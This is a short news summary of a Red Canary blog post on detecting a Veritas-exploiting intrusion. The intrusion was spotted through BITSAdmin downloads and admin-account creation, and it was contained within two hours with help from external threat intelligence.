Red Canary Gives Insights of Where BITSAdmin Can Initiate a Investigation
Insights into the detection of a potential threat involving the BITSAdmin tool are meticulously outlined in a blog by Red Canary's Detection Engineer, Han Shan, and Threat Specialist, Laura Brosnan. The incident unfolded with an alert triggered by BITSAdmin downloading a file, prompting concerns due to irregular admin activity, an IP address registered in Russia, and an attempt to save a one-character HTML file as an executable. While the downloaded executable file "did not seem to successfully execute after being downloaded," tracing the parent process revealed other signs of suspicious activity. BITSAdmin was called by CMD in which the process command included creating various Admin accounts. Interestingly Han observed the created administrator accounts had "passwords associated with large Russian business entities and interests."
Delving further into the process tree, it was revealed that CMD was invoked by a Veritas process, beremote.exe, suggesting potential exploitation of the software for malicious purposes. Red Canary promptly engaged their customer, and additional insights from a Mandiant report linked the incident to a known ransomware operator exploiting Veritas CVEs. Through swift collaboration, Red Canary and the customer eradicated the threat within two hours, emphasizing the critical role of timely threat detection and mitigation.
Red Canary's intervention thwarted additional malicious activity, with supplementary OSINT reports hinting at the possible installation of AnyDesk for further compromise. Notably, the adversary's utilization of a specific fixed password is linked to both an Admin account created through CMD and AnyDesk substantiating the attacker's tactics, techniques, and procedures (TTPs). This detection spotlight underscores the importance of not just detecting and scrutinizing abnormal activities but also effectively leveraging external intelligence for a comprehensive understanding of the threat landscape. The seamless coordination between Red Canary's threat engineers and hunters, combined with proactive customer communication, played a pivotal role in swiftly mitigating the potential impact of the attack and reinforcing the organization against future threats.